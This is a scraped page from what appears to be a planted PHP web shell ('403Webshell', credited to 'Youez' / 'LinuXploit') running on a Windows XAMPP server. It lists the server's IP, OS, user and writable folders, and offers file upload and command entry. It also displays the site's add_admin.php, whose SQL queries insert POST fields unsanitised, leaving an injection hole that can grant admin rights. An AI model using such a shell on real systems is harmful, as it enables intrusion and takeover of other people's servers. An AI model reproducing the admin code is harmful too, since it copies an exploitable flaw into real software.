403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.48
Web Server : Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
System : Windows NT DESKTOP-3H4FHQJ 10.0 build 19045 (Windows 10) AMD64
User : win 10 ( 0)
PHP Version : 8.2.12
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  D:/xampp/htdocs-coblaa/Cinevaa/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : D:/xampp/htdocs-coblaa/Cinevaa/add_admin.php
<?php 
include('db.php'); 
include('con_db.php'); 
session_start();
if (!isset($_SESSION['my_id'])) {
    header("Location: login.php");
    exit();
}

$my_id = $_SESSION['my_id'];
// Security: Only existing admins can add new admins
if (!isset($_SESSION['is_admin']) || $_SESSION['is_admin'] !== true) {
    header("Location: index.php");
    exit();
}

if (isset($_POST['submit'])) {
    $userid = $_POST['userid']; // We use email to find the user's ID
    $role = $_POST['role'];

    // 1. Find the my_id from cb_userstb
    $find_user = mysqli_query($conn, "SELECT my_id, fname FROM cb_userstb WHERE my_id = '$userid'");
    
    if (mysqli_num_rows($find_user) > 0) {
        $user_row = mysqli_fetch_assoc($find_user);
        $uname = $user_row['fname'];

        // 2. Insert into admins table linked by my_id
        $sql = "INSERT INTO admins (my_id, username, user_id, role) VALUES ('$my_id', '$uname', '$userid', '$role')";

        if (mysqli_query($con, $sql)) {
            header("Location: admin_temp?msg=User Promoted to Admin");
        } else {
            echo "Error: " . mysqli_error($con);
        }
    } else {
        echo "Error: No user found with this Id. They must register first.";
    }
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <title>Add New Admin</title>
</head>
<body class="bg-light">
    <div class="container mt-5">
        <div class="row justify-content-center">
            <div class="col-md-6">
                <div class="card shadow">
                    <div class="card-header bg-primary text-white"><h5>Add New Admin</h5></div>
                    <div class="card-body">
                        <form action="add_admin.php" method="POST">
                            <div class="mb-3">
                                <label>Username</label>
                                <input type="text" name="username" class="form-control" required>
                            </div>
                            <div class="mb-3">
                                <label>User ID</label>
                                <input type="text" name="userid" class="form-control" required>
                            </div>
 
                            <div class="mb-3">
                                <label>Role</label>
                                <select name="role" class="form-select">
                                    <option value="admin">superadmin</option>
                                    <option value="editor">editor</option>
                                </select>
                            </div>
                            <button type="submit" name="submit" class="btn btn-success w-100">Save Admin</button>
                            <a href="index.php" class="btn btn-link w-100 mt-2">Back to List</a>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit